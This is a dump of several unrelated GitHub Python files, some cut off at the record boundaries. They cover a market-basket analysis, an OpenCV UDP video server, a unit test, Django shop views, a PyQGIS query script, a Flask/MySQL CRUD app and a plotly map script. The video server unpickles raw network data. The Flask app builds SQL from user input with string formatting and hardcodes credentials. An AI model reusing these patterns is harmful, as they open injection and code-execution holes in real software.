two items, then which item is more likely to be added to the basket?\r\nrules['lhs items'] = rules['antecedents'].apply(lambda x:len(x) )\r\nrules[rules['lhs items']>1].sort_values('lift', ascending=False).head()\r\nrules.to_csv('rules.csv', index=False)\r\n\r\n# Data visualization of Market Basket Analysis\r\nimport seaborn as sns\r\n# Replace frozen sets with strings\r\nrules['antecedents_'] = rules['antecedents'].apply(lambda a: ','.join(list(a)))\r\nrules['consequents_'] = rules['consequents'].apply(lambda a: ','.join(list(a)))\r\n# Transform the DataFrame of rules into a matrix using the lift metric\r\npivot = rules[rules['lhs items']>=1].pivot(\r\n index='antecedents_', columns='consequents_', values= 'lift')\r\n# Generate a heatmap with annotations on and the colorbar off\r\nfig, ax = plt.subplots(figsize=(8,7)) \r\nm = sns.heatmap(pivot, annot=True, linewidths=.1, annot_kws={\"size\":10}, ax=ax)\r\nplt.ylabel('Antecedents')\r\nplt.xlabel('Consequents')\r\nplt.yticks(rotation=0)\r\nplt.xticks(rotation=90)\r\nplt.show()\r\n\r\nn = m.get_figure()\r\nn.savefig('heatmap.png', bbox_inches='tight')\r\n\r\n#by aisle\r\norder3 = order1.merge(aisles, how='inner')\r\norder3 = order3.groupby('order_id')['aisle'].agg(', '.join).reset_index()\r\n\r\n# get all shopping lists as one list\r\none_product2 = list(order3['aisle'].apply(lambda x: sorted(x.split(','))))\r\n\r\n# instantiate transcation encoder\r\nencoder = TransactionEncoder().fit(one_product2)\r\nonehot = encoder.transform(one_product2)\r\n\r\n# convert one-hot encode data to DataFrame\r\nonehot = pd.DataFrame(onehot, columns=encoder.columns_)\r\n# compute frequent items using the Apriori algorithm - Get up to three items\r\nfrequent_itemsets = apriori(onehot, min_support=.006, max_len=3, use_colnames=True)\r\nfrequent_itemsets.to_csv('frequent_itemsets2.csv', index=False)\r\n\r\n# compute all association rules for frequent_itemsets\r\nrules = association_rules(frequent_itemsets, metric=\"lift\", min_threshold=1)\r\n\r\n# given that the left-hand side has two items, then which item is more likely to be added to the basket?\r\nrules['lhs items'] = rules['antecedents'].apply(lambda x:len(x) )\r\nrules[rules['lhs items']>1].sort_values('lift', ascending=False).head()\r\nrules.to_csv('rules.csv', index=False)\r\n\r\n# Data visualization of Market Basket Analysis\r\nimport seaborn as sns\r\n# Replace frozen sets with strings\r\nrules['antecedents_'] = rules['antecedents'].apply(lambda a: ','.join(list(a)))\r\nrules['consequents_'] = rules['consequents'].apply(lambda a: ','.join(list(a)))\r\n# Transform the DataFrame of rules into a matrix using the lift metric\r\npivot = rules[rules['lhs items']>=1].pivot(\r\n index='antecedents_', columns='consequents_', values= 'lift')\r\n# Generate a heatmap with annotations on and the colorbar off\r\nfig, ax = plt.subplots(figsize=(8,7)) \r\nm = sns.heatmap(pivot, annot=True, linewidths=.1, annot_kws={\"size\":10}, ax=ax)\r\nplt.ylabel('Antecedents')\r\nplt.xlabel('Consequents')\r\nplt.yticks(rotation=0)\r\nplt.xticks(rotation=90)\r\nplt.show()\r\n\r\nn = m.get_figure()\r\nn.savefig('heatmap2.png', bbox_inches='tight')\r\n\r\n# Examining Big Data processing issues\r\nonehot.info(verbose=False, memory_usage=\"deep\") #memory usage: 7.0 GB!\r\n\r\n# 5) Multinomial mixture model\r\n#Based on: https://towardsdatascience.com/multinomial-mixture-model-for-supermarket-shoppers-segmentation-a-complete-tutorial-268974d905da\r\n# Data preparation\r\n# Tree structure of the problem (actually, a forest): \r\n #user_id -> order_id -> product_id\r\n \r\norder3 = order1[['order_id', 'product_id']]\r\norder3 = order3.merge(orders, how='inner')\r\norder3 = order3[['user_id', 'order_id', 'product_id']]\r\n\r\n#However, we do have departments and ailes\r\norder4 = order1.merge(departments, how='inner')\r\norder4.groupby('department')['order_id'].count().plot(kind=\"bar\")\r\norder4 = order4.merge(aisles, how='inner')\r\norder4.groupby('aisle')['order_id'].count().plot(kind=\"bar\")\r\n\r\n# Sparse matrix\r\nimport numpy as np\r\nfrom scipy import sparse\r\n\r\norder5 = order4.apply(lambda s:s.astype(\"category\"))\r\norder5.aisle.cat.categories\r\narr = sparse.coo_matrix((np.ones(order5.shape[0]), \r\n (order5.aisle.cat.codes, order5.order_id.cat.codes)))\r\n\r\n#split numpy array in train and test datasets following the 80/20 rule\r\narr2 = arr.toarray()\r\narr2 = arr2.astype(int)\r\narr3 = pd.DataFrame.sparse.from_spmatrix(arr)\r\n\r\n#pickling, so the work won't be lost\r\n\r\nimport pickle\r\n\r\nwith open('arr.pickle', 'wb') as f:\r\n pickle.dump(arr, f) \r\nwith open('arr2.pickle', 'wb') as f:\r\n pickle.dump(arr2, f)\r\narr3.to_pickle('arr3.pickle')\r\norder1.to_pickle('order1.pickle')\r\norder2.to_pickle('order2.pickle')\r\norder3.to_pickle('order3.pickle')\r\norder4.to_pickle('order4.pickle')\r\norder5.to_pickle('order5.pickle')\r\n\r\n# How many products do clients usually buy?\r\n\r\ndef plot_customer_freq(x):\r\n basket_counts_by_customer = x.groupby(['order_id'])['product_id'].count()\r\n basket_counts_by_customer.plot.hist(bins=np.arange(100))\r\n\r\nplot_customer_freq(order3)\r\n\r\n# Make a sparse matrix with two indexes: user and order\r\n\r\norder6 = order3.merge(products, how='inner')\r\norder6 = order6[['user_id', 'order_id', 'product_name']]\r\n\r\nbaskets_data = order6.groupby(['user_id', 'order_id'])['product_name'].value_counts()\r\nbaskets_data_df = pd.DataFrame(data=baskets_data.values, index=baskets_data.index,\r\n columns=['Count']).reset_index()\r\ncounts_df = baskets_data_df.pivot(index=['user_id', 'order_id'], columns=['product_name'],\r\n values=['Count'])['Count']\r\ncounts_df.fillna(0, inplace=True)\r\n\r\n\r\n\r\n#Implementation of the algorithm\r\n\r\nfrom tqdm import tqdm\r\nfrom scipy.stats import multinomial, dirichlet\r\n\r\nclass MultinomialExpectationMaximizer:\r\n def __init__(self, K, rtol=1e-4, max_iter=100, restarts=10):\r\n self._K = K\r\n self._rtol = rtol\r\n self._max_iter = max_iter\r\n self._restarts = restarts\r\n\r\n def compute_log_likelihood(self, X_test, alpha, beta):\r\n mn_probs = np.zeros(X_test.shape[0])\r\n for k in range(beta.shape[0]):\r\n mn_probs_k = alpha[k] * self._multinomial_prob(X_test, beta[k])\r\n mn_probs += mn_probs_k\r\n mn_probs[mn_probs == 0] = np.finfo(float).eps\r\n return np.log(mn_probs).sum()\r\n \r\n def compute_aic(self, X_test, alpha, beta, log_likelihood=None):\r\n if log_likelihood is None:\r\n log_likelihood = self.compute_predictive_entropy(X_test, alpha, beta)\r\n return 2 * (alpha.size + beta.size) - 2 * log_likelihood\r\n\r\n def compute_bic(self, X_test, alpha, beta, log_likelihood=None):\r\n if log_likelihood is None:\r\n log_likelihood = self.compute_predictive_entropy(X_test, alpha, beta)\r\n N = X_test.shape[0]\r\n nb_params = (alpha.shape[0] - 1) + (beta.shape[0] * (beta.shape[1] - 1))\r\n return -log_likelihood + (0.5 * np.log(N) * nb_params)\r\n \r\n def compute_icl_bic(self, bic, gamma):\r\n classification_entropy = -(np.log(gamma.max(axis=1))).sum()\r\n return bic + classification_entropy\r\n\r\n def _multinomial_prob(self, counts, beta):\r\n \"\"\"\r\n Evaluates the multinomial probability for a given vector of counts\r\n counts: (C), vector of counts for a specific observation\r\n beta: (C), vector of parameters for every component of the multinomial\r\n\r\n Returns:\r\n p: (1), scalar value for the probability of observing the count vector given the beta parameters\r\n \"\"\"\r\n n = counts.sum(axis=-1)\r\n m = multinomial(n, beta)\r\n return m.pmf(counts)\r\n\r\n def _e_step(self, X, alpha, beta):\r\n \"\"\"\r\n Performs E-step on MNMM model\r\n Each input is numpy array:\r\n X: (N x C), data points\r\n alpha: (K), mixture component weights\r\n beta: (K x C), multinomial categories weights\r\n\r\n Returns:\r\n gamma: (N x K), probabilities of clusters for objects\r\n \"\"\"\r\n # Compute gamma\r\n N = X.shape[0]\r\n K = alpha.shape[0]\r\n weighted_multi_prob = np.zeros((N, K))\r\n for k in range(K):\r\n weighted_multi_prob[:, k] = alpha[k] * self._multinomial_prob(X, beta[k])\r\n\r\n denum = weighted_multi_prob.sum(axis=1)\r\n gamma = weighted_multi_prob / denum.reshape(-1, 1)\r\n\r\n return gamma\r\n\r\n def _m_step(self, X, gamma):\r\n \"\"\"\r\n Performs M-step on MNMM model\r\n Each input is numpy array:\r\n X: (N x C), data points\r\n gamma: (N x K), probabilities of clusters for objects\r\n\r\n Returns:\r\n alpha: (K), mixture component weights\r\n beta: (K x C), mixture categories weights\r\n \"\"\"\r\n # Compute alpha\r\n alpha = gamma.sum(axis=0) / gamma.sum()\r\n\r\n # Compute beta\r\n weighted_counts = gamma.T.dot(X)\r\n beta = weighted_counts / weighted_counts.sum(axis=-1).reshape(-1, 1)\r\n\r\n return alpha, beta\r\n\r\n def _compute_vlb(self, X, alpha, beta, gamma):\r\n \"\"\"\r\n Each input is numpy array:\r\n X: (N x C), data points\r\n alpha: (K), mixture component weights\r\n beta: (K x C), multinomial categories weights\r\n gamma: (N x K), probabilities of clusters for objects\r\n\r\n Returns value of variational lower bound\r\n \"\"\"\r\n loss = 0\r\n for k in range(alpha.shape[0]):\r\n weights = gamma[:, k]\r\n loss += np.sum(weights * (np.log(alpha[k]) + np.log(self._multinomial_prob(X, beta[k]))))\r\n loss -= np.sum(weights * np.log(weights))\r\n return loss\r\n \r\n def _init_params(self, C):\r\n alpha = np.array([1 / self._K] * self._K)\r\n beta = dirichlet.rvs([2 * C] * C, self._K)\r\n return alpha, beta\r\n\r\n def _train_once(self, X):\r\n loss = float('inf')\r\n C = X.shape[1]\r\n alpha, beta = self._init_params(C)\r\n\r\n for it in range(self._max_iter):\r\n prev_loss = loss\r\n gamma = self._e_step(X, alpha, beta)\r\n alpha, beta = self._m_step(X, gamma)\r\n loss = self._compute_vlb(X, alpha, beta, gamma)\r\n if it > 0 and (np.abs((prev_loss - loss) / prev_loss) < self._rtol):\r\n break\r\n return alpha, beta, gamma, loss\r\n\r\n def fit(self, X):\r\n '''\r\n Starts with random initialization *restarts* times\r\n Runs optimization until saturation with *rtol* reached\r\n or *max_iter* iterations were made.\r\n\r\n X: (N, C), data points\r\n K: int, number of clusters\r\n '''\r\n best_loss = -float('inf')\r\n best_alpha = None\r\n best_beta = None\r\n best_gamma = None\r\n\r\n for it in range(self._restarts):\r\n alpha, beta, gamma, loss = self._train_once(X)\r\n if loss > best_loss:\r\n best_loss = loss\r\n best_alpha = alpha\r\n best_beta = beta\r\n best_gamma = gamma\r\n\r\n return best_loss, best_alpha, best_beta, best_gamma\r\n \r\ndef run_em(X, K_max=20, criterion='icl_bic'):\r\n \r\n if criterion not in {'icl_bic', 'bic'}:\r\n raise Exception('Unknown value for criterion: %s' % criterion)\r\n\r\n X = np.vstack(X)\r\n np.random.shuffle(X)\r\n\r\n nb_train = int(X.shape[0] * 0.8)\r\n X_train = X[:nb_train]\r\n X_test = X[nb_train:]\r\n\r\n likelihoods = []\r\n bics = []\r\n icl_bics = []\r\n best_k = -1\r\n best_alpha = None\r\n best_beta = None\r\n best_gamma = None\r\n prev_criterion = float('inf')\r\n \r\n for k in tqdm(range(2, K_max + 1)):\r\n model = MultinomialExpectationMaximizer(k, restarts=1)\r\n _, alpha, beta, gamma = model.fit(X_train)\r\n log_likelihood = model.compute_log_likelihood(X_test, alpha, beta)\r\n bic = model.compute_bic(X_test, alpha, beta, log_likelihood)\r\n icl_bic = model.compute_icl_bic(bic, gamma)\r\n likelihoods.append(log_likelihood)\r\n bics.append(bic)\r\n icl_bics.append(icl_bic)\r\n\r\n criterion_cur_value = icl_bic if criterion == 'icl_bic' else bic\r\n if criterion_cur_value < prev_criterion:\r\n prev_criterion = criterion_cur_value\r\n best_alpha = alpha\r\n best_beta = beta\r\n best_gamma = gamma\r\n best_k = k\r\n \r\n print('best K = %i' % best_k)\r\n print('best_alpha: %s' % str(best_alpha))\r\n print('best_beta: %s' % str(best_beta))\r\n \r\n return likelihoods, bics, icl_bics, best_alpha, best_beta, best_gamma\r\n\r\nimport matplotlib.tri as tri\r\nimport matplotlib.lines as lines\r\nfrom collections import defaultdict\r\n\r\ncorners = np.array([[0, 0], [1, 0], [0.5, 0.75**0.5]])\r\nAREA = 0.5 * 1 * 0.75**0.5\r\ntriangle = tri.Triangulation(corners[:, 0], corners[:, 1])\r\n\r\npairs = [corners[np.roll(range(3), -i)[1:]] for i in range(3)]\r\n# The area of the triangle formed by point xy and another pair or points\r\ntri_area = lambda xy, pair: 0.5 * np.linalg.norm(np.cross(*(pair - xy)))\r\n\r\ndef xy2bc(xy, tol=1.e-4):\r\n '''Converts 2D Cartesian coordinates to barycentric.'''\r\n coords = np.array([tri_area(xy, p) for p in pairs]) / AREA\r\n return np.clip(coords, tol, 1.0 - tol)\r\n\r\ndef trimesh_coords_to_bucket_counts(trimesh, X):\r\n bucket_values_to_coord = {tuple(np.round(xy2bc(xy) * 16).astype(np.int)): xy for xy in zip(trimesh.x, trimesh.y)}\r\n coord_to_counts = defaultdict(int)\r\n for x in X:\r\n coord = bucket_values_to_coord[tuple(x)]\r\n coord_to_counts[coord] += 1\r\n counts = [coord_to_counts[xy] for xy in zip(trimesh.x, trimesh.y)]\r\n return counts\r\n\r\ndef plot_simplex():\r\n refiner = tri.UniformTriRefiner(triangle)\r\n trimesh = refiner.refine_triangulation(subdiv=4)\r\n\r\n fig, axes = plt.subplots(ncols=2, figsize=(16,7.1))\r\n axes = axes.ravel()\r\n for ax in axes:\r\n ax.axis('off')\r\n axes[0].triplot(trimesh, linewidth=1, color='darkgray')\r\n axes[1].triplot(trimesh, linewidth=1, color='darkgray')\r\n axes[1].set_title('Trinomial(n=16, β=[0.25, 0.5, 0.25])')\r\n \r\n tick_spacement = 1/16\r\n height = 0.75**0.5\r\n \r\n ax = axes[0]\r\n \r\n ax.text(-0.18, -0.12, 'X1', size=20)\r\n tick_x = 0\r\n tick_y = 0\r\n for i in range(17):\r\n if i % 2 == 0:\r\n ax.text(tick_x - 0.02, tick_y + 0.02, str(16-i), size=12)\r\n tick_x += height**2/16\r\n tick_y += 0.5*height/16\r\n\r\n dim_l1 = lines.Line2D([height**2, -0.07], [0.5*height, -0.04], linestyle='-', color='darkgray')\r\n ax.add_line(dim_l1)\r\n ax.scatter([-0.07], [-0.04], marker=(3, 0, 0), s=80, color='darkgray')\r\n \r\n # X2 axis\r\n ax.text(0.465, 1.04, 'X2', size=20)\r\n tick_y = 0\r\n for i in range(17):\r\n if i % 2 == 0:\r\n ax.text(0.51, tick_y + 0.01, str(i), size=12)\r\n tick_y += height/16\r\n \r\n dim_l2 = lines.Line2D([0.5, 0.5], [0, 0.98], linestyle='-', color='darkgray')\r\n ax.add_line(dim_l2)\r\n ax.scatter([0.498], [0.98], marker=(3, 0, 0), s=80, color='darkgray')\r\n\r\n # X3 axis\r\n ax.text(1.14, -0.12, 'X3', size=20)\r\n\r\n tick_x = 0.25\r\n tick_y = height/2\r\n for i in range(17):\r\n if i % 2 == 0:\r\n ax.text(tick_x + 0.01, tick_y + 0.01, str(i), size=12)\r\n tick_x += height**2/16\r\n tick_y -= 0.5*height/16\r\n\r\n dim_l3 = lines.Line2D([0.25, 1.1], [height/2, -(0.08/2**0.5)], linestyle='-', color='darkgray')\r\n ax.add_line(dim_l3)\r\n ax.scatter([1.1], [-(0.08/2**0.5)], marker=(3, 0, i*90), s=80, color='darkgray')\r\n\r\n\r\n return trimesh\r\n \r\ndef plot_trinomial(trimesh, x, color, n=None):\r\n n = n if n is not None else x.sum()\r\n counts = trimesh_coords_to_bucket_counts(trimesh, x)\r\n plt.scatter(x=trimesh.x, y=trimesh.y, color=color, \r\n zorder=100,\r\n s=(np.array(counts) / n)*100000)\r\n\r\ndef plot_trinomials(X, colors):\r\n trimesh = plot_simplex()\r\n n = np.sum([x.sum() for x in X])\r\n for x, color in zip(X, colors):\r\n plot_trinomial(trimesh, x, color, n)\r\n\r\ndef make_dataset(n, alpha, beta):\r\n xs = []\r\n for k, alpha_k in enumerate(alpha):\r\n n_k = int(n * alpha_k)\r\n x = multinomial.rvs(n=16, p=beta[k], size=n_k)\r\n xs.append(x)\r\n return xs\r\n\r\nalpha = [1/3]\r\nbeta = np.array([[0.25, 0.25, 0.5]])\r\nX = make_dataset(10000, alpha, beta)\r\ncolors = ['coral']\r\n\r\nplot_trinomials(X, colors)\r\nplt.scatter([0.5], [((0.75**0.5)*0.5)], marker='*', s=100, color='red', zorder=100)\r\n\r\ndef plot_simplex():\r\n refiner = tri.UniformTriRefiner(triangle)\r\n trimesh = refiner.refine_triangulation(subdiv=4)\r\n\r\n fig, ax = plt.subplots(figsize=(8,7.1))\r\n ax.axis('off')\r\n plt.triplot(trimesh, linewidth=1, color='darkgray')\r\n \r\n ax.text(-0.09, -0.06, 'X1', size=20)\r\n ax.text(0.465, 0.9, 'X2', size=20)\r\n ax.text(1.07, -0.06, 'X3', size=20)\r\n \r\n tick_spacement = 1/16\r\n\r\n return trimesh\r\n\r\nalpha = [1/3]\r\nbeta = np.array([[0.25, 0.25, 0.5]])\r\nX = make_dataset(10000, alpha, beta)\r\ncolors = ['coral']\r\n\r\nplot_trinomials(X, colors)\r\nplt.scatter([0.5], [((0.75**0.5)*0.5)], marker='*', s=100, color='red', zorder=100)\r\n\r\ndef plot_em_run(likelihoods, ax):\r\n Ks = list(range(2, len(likelihoods) + 2))\r\n ax.scatter(Ks, likelihoods)\r\n ax.set_title('Likelihood by values of K')\r\n ax.set_ylabel('Likelihood')\r\n ax.set_xticks(Ks)\r\n ax.set_xticklabels(Ks)\r\n ax.set_xlabel('K')\r\n\r\ndef plot_simplex(ax):\r\n refiner = tri.UniformTriRefiner(triangle)\r\n trimesh = refiner.refine_triangulation(subdiv=4)\r\n\r\n ax.triplot(trimesh, linewidth=1, color='darkgray')\r\n ax.axis('off')\r\n \r\n ax.text(-0.09, -0.06, 'X1', size=20)\r\n ax.text(0.465, 0.9, 'X2', size=20)\r\n ax.text(1.07, -0.06, 'X3', size=20)\r\n \r\n tick_spacement = 1/16\r\n\r\n return trimesh\r\n\r\ndef plot_trinomial(trimesh, x, color, ax, z, n=None):\r\n n = n if n is not None else x.sum()\r\n counts = trimesh_coords_to_bucket_counts(trimesh, x)\r\n ax.scatter(x=trimesh.x, y=trimesh.y, color=color, \r\n zorder=z,\r\n s=(np.array(counts) / n)*100000)\r\n\r\ndef plot_trinomials(X, colors, ax):\r\n trimesh = plot_simplex(ax)\r\n n = np.sum([x.sum() for x in X])\r\n z=100\r\n for x, color in zip(X, colors):\r\n plot_trinomial(trimesh, x, color, ax, z, n)\r\n z -= 1\r\n\r\ndef make_dataset(n, alpha, beta):\r\n xs = []\r\n for k, alpha_k in enumerate(alpha):\r\n n_k = int(n * alpha_k)\r\n x = multinomial.rvs(n=16, p=beta[k], size=n_k)\r\n xs.append(x)\r\n return xs\r\n\r\nalpha = [0.1, 0.1, 0.8]\r\nbeta = np.array([[0.1, 0.1, 0.8], \r\n [0.1, 0.8, 0.1], \r\n [0.8, 0.1, 0.1]])\r\nX = make_dataset(10000, alpha, beta)\r\ncolors = ('coral', 'forestgreen', 'purple')\r\n\r\nlikelihoods, bics, icl_bics, best_alpha, best_beta, best_gamma = run_em(X, criterion='bic')\r\n\r\nfig, axes = plt.subplots(ncols=2, figsize=(16, 7.1))\r\naxes = axes.ravel()\r\nplot_trinomials(X, colors, axes[0])\r\nplot_em_run(likelihoods, axes[1])\r\n","repo_name":"pedroafleite/instacart-market-basket-analysis","sub_path":"instacart_modelling.py","file_name":"instacart_modelling.py","file_ext":"py","file_size_in_byte":20475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"30592844137","text":"import cv2, pickle, socket, os\n\n# https://medium.com/nerd-for-tech/live-streaming-using-opencv-c0ef28a5e497\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nserver_ip = \"127.0.0.1\"\nserver_port = 6655\n\nprint(f\"Binding server at {server_ip}:{server_port}\")\n\ns.bind((server_ip, server_port))\n\n\nwhile True:\n read_socket = s.recvfrom(1000000)\n\n pusher_ip = read_socket[1][0]\n img_data_raw = read_socket[0]\n\n img_data = pickle.loads(img_data_raw)\n\n print(f\"Received data from {pusher_ip}: {img_data}\")\n\n\n\n img = cv2.imdecode(img_data, cv2.IMREAD_COLOR)\n cv2.imshow(\"DroneDisplay\", img)\n\n if cv2.waitKey(10) == 13:\n break\n\ncv2.destroyAllWindows()\n\n\n","repo_name":"gronnmann/LineFollower","sub_path":"cv_display_server.py","file_name":"cv_display_server.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21390590682","text":"import unittest\nfrom unittest.mock import MagicMock, patch\n\nfrom videos_api.utils import get_video_info\n\n\nclass TestGetVideo(unittest.TestCase):\n def setUp(self) -> None:\n self.url = \"http://testing.com/\"\n return super().setUp()\n\n def test_get_video_info_success(self):\n response_mock = MagicMock()\n response_mock.status_code = 200\n video_info = {\"video_name\": \"Testing video\"}\n response_mock.json = MagicMock(return_value=[video_info])\n\n with patch(\"requests.get\", return_value=response_mock):\n frame_data = get_video_info(self.url)\n\n self.assertEqual(frame_data, video_info)\n self.assertIsInstance(frame_data, dict)\n\n def test_get_video_info_failure(self):\n response_mock = MagicMock()\n response_mock.status_code = 400\n\n with patch(\"requests.get\", return_value=response_mock):\n frame_data = get_video_info(self.url)\n\n self.assertIsNone(frame_data)\n","repo_name":"amssdias/telegram-bot","sub_path":"tests/videos_api/test_get_video.py","file_name":"test_get_video.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70063476646","text":"from django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404, render\n\nfrom .models import Category, Size, Product\n\n\ndef categories_list(request, category_slug=None):\n category = get_object_or_404(Category, slug=category_slug)\n products = Product.objects.filter(category__in=Category.objects.get(slug=category_slug).get_descendants(include_self=True))\n return render(request, 'store/category.html', {'category': category, 'products': products})\n\ndef products_all(request):\n products = Product.objects.prefetch_related(\"product_image\").filter(in_stock=True)\n return render(request, 'store/home.html', {'products': products})\n\ndef product_info(request, slug):\n product = get_object_or_404(Product, \n slug=slug, \n in_stock=True\n )\n sizes = Size.objects.filter(\n product=product, in_stock=True\n )\n \n return render(request, 'store/product_info.html', {'product': product, 'sizes': sizes})\n\ndef get_quantities(request):\n size = request.GET.get('size')\n quantities = list(Size.objects.filter(prod_size=size).values(\"quantity\"))\n response_data = {\n \"quantities\": quantities\n }\n return JsonResponse(response_data)\n\ndef about_info(request):\n return render(request, 'store/about_info.html')\n","repo_name":"elgizabbasov/kicksale","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4251626990","text":"from osgeo import ogr # connection to geopackage\r\nimport os\r\nfrom qgis.PyQt.QtCore import QVariant # types for attributes in vector layers QVariant.String, QVariant.Int, QVariant.Double\r\n\r\nmyfolder=r'C:\\Users\\mlc\\Documents\\PyQGIS'\r\n# source auxiliary functions (instead of importing module)\r\nexec(open(os.path.join(myfolder,'scripts','auxiliary_functions.py').encode('utf-8')).read())\r\n\r\n#clear layer tree and canvas and creates instance of project\r\nmyproject,mycanvas = my_clean_project()\r\n\r\n# Constants and SQL queries\r\n# geopackage name\r\nfn = os.path.join(myfolder,'input','CascaisZoning.gpkg')\r\nmycrs=3763\r\n\r\n# Note: to list tables, useful to know the table name in the sql query\r\ngpkg_layers = [l.GetName() for l in ogr.Open(fn)]\r\n#print(gpkg_layers)\r\n\r\n# QUERY:\r\n# Determine how many features Roads has\r\nmyquery=\"SELECT COUNT(*) from Roads\"\r\nmyoutputdict={}\r\n\r\n# Determine which values Roads.roadType takes\r\nmyquery=\"SELECT DISTINCT Roads.roadType from Roads\"\r\nmyoutputdict={}\r\n\r\n# Determine Roads which Type is not 'P': returns geometry\r\nmyquery=\"SELECT roadType,Roads.geom FROM Roads WHERE NOT roadType='P' \"\r\nmyoutputdict={'roadType': QgsField('roadType',QVariant.String),'geom':'MULTILINESTRING'}\r\n\r\n# Join attribute tables (LandUse and LandUseTypes). No \"join clause\": equivalent to \"INNER JOIN\"\r\nmyselect= ' SELECT LandUse.codeUse, LandUseTypes.Use, LandUse.geom '\r\nmyfrom = ' FROM LandUse, LandUseTypes '\r\nmywhere= ' WHERE LandUse.codeUse=LandUseTypes.Code'\r\nmyquery= myselect+myfrom+mywhere\r\nmyoutputdict={'code':QgsField('code',QVariant.String), 'use':QgsField('use',QVariant.String),'geom':'MULTIPOLYGON'}\r\n\r\n################################################################ Open connection to geopackage\r\n# For info, if GPKG, use \"ogr\", if spatialite, use \"spatialite\"\r\nmd = QgsProviderRegistry.instance().providerMetadata(\"ogr\")\r\nconn = md.createConnection( fn, {})\r\n\r\n################################################################# Execute query\r\nresult = conn.executeSql(myquery) # returns list\r\n\r\n##################################################################Output result as new layer\r\nmylayer=create_layer_from_sql_spatial_result(result,myoutputdict,mycrs)\r\n\r\n# add mylayer to the project\r\nmyproject.addMapLayer(mylayer)\r\n","repo_name":"manuelcampagnolo/PyQGIS_2nd_edition","sub_path":"session_8_a_v2_Cascais_first_examples_SQL_queries_with_function.py","file_name":"session_8_a_v2_Cascais_first_examples_SQL_queries_with_function.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16381592795","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_mysqldb import MySQL\n\n# initializations\napp = Flask(__name__)\n\n# Mysql Connection\napp.config['MYSQL_HOST'] = 'localhost' \napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'pass'\napp.config['MYSQL_DB'] = 'flaskcrud'\nmysql = MySQL(app)\n\n# settings\napp.secret_key = \"mysecretkey\"\n\n# routes\n@app.route('/')\ndef Index():\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM Products')\n data = cur.fetchall()\n cur.close()\n return render_template('index.html', contacts = data)\n\n@app.route('/add_contact', methods=['POST'])\ndef add_contact():\n if request.method == 'POST':\n nombre = request.form['Nombre']\n unidad = request.form['Unidad_medida']\n precio = request.form['Precio']\n stock = request.form['Stock']\n total= int(precio)* int(stock) \n print(stock)\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO Products(nombre, unidad_medida, precio, stock,total) VALUES (%s,%s,%s,%s,%s)\", \n (nombre, unidad, precio, stock, total))\n mysql.connection.commit()\n flash('Product Added successfully')\n return redirect(url_for('Index'))\n\n@app.route('/edit/', methods = ['POST', 'GET'])\ndef get_contact(id):\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM Products WHERE id = %s', (id))\n data = cur.fetchall()\n cur.close()\n return render_template('edit-contact.html', contact = data[0])\n\n@app.route('/update/', methods=['POST'])\ndef update_contact(id):\n if request.method == 'POST':\n nombre = request.form['Nombre']\n unidad = request.form['Unidad_medida']\n precio = request.form['Precio']\n stock = request.form['Stock']\n total= int(precio)* int(stock) \n cur = mysql.connection.cursor()\n cur.execute(\"\"\"\n UPDATE Products SET nombre = %s,unidad_medida = %s,precio = %s,stock = %s,total =%s WHERE id = %s\n \"\"\", (nombre, unidad, precio, stock, total, id))\n flash('Contact Updated Successfully')\n mysql.connection.commit()\n return redirect(url_for('Index'))\n\n@app.route('/delete/', methods = ['POST','GET'])\ndef delete_contact(id):\n cur = mysql.connection.cursor()\n cur.execute('SELECT stock FROM Products WHERE id={0}'.format(id))\n data = cur.fetchall()\n Contact = data[0]\n if Contact[0] > 0:\n print('Can´t Removed Product')\n else:\n cur.execute('DELETE FROM Products WHERE id = {0}'.format(id))\n mysql.connection.commit()\n flash('Contact Removed Successfully')\n return redirect(url_for('Index'))\n\n@app.route('/search', methods = ['POST','GET'])\ndef search():\n if request.method == 'POST':\n nombre =request.form['Nombre']\n nombre_formato='\"'+nombre+'\"'\n print(nombre_formato)\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM Products WHERE nombre= {0}'.format(nombre_formato))\n data = cur.fetchall()\n cur.close()\n print(data)\n return render_template('search.html', contact = data[0]) \n# starting the app\nif __name__ == \"__main__\":\n app.run(port=3000, debug=True)\n","repo_name":"Hunteryellow22/prueba","sub_path":"crud_flask-main/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37813748327","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: Davis Cook and John Murzaku \n\"\"\"\n#Code written to present at a school open house.\n#Takes in an excel document and exports it as a\n#choropleth map to plot.ly.\n#My plotly projects are viewable at: https://plot.ly/~davisCook\nimport pandas as pd\nimport plotly.plotly as py\n\n#Opens Excel document\n#df should have the columns code, state, and total students.\n#code is a strgin and is the state abbreviation.\n#state is a string and is the state\n#total students is an int stating the total number of students from the state\ndfT = pd.read_excel(\"rsvpOH1.xlsx\")\nstates = dfT[\"Address Region\"].tolist()\n\n#Puts all the state abbreviation in the dictionary\nstatesD = {}\nfor x in states:\n if x in statesD:\n statesD[x] += 1\n else:\n statesD[x] = 1\n\n\n\n\n# Makes sure that the column heads are strings\nfor col in df.columns:\n df[col] = df[col].astype(str)\n\n#Sets the scale for colors on the map. Because this was for an open house\n#these colors are derivatives of the school colors.\nscl = [[0.0, \"rgb(162, 170, 173)\"],[0.000001, \"rgb(129, 149, 165)\"],[0.001, \"rgb(97, 129, 158)\"],\\\n [0.05, \"rgb(64, 108, 150)\"],[0.2, \"rgb(32, 88, 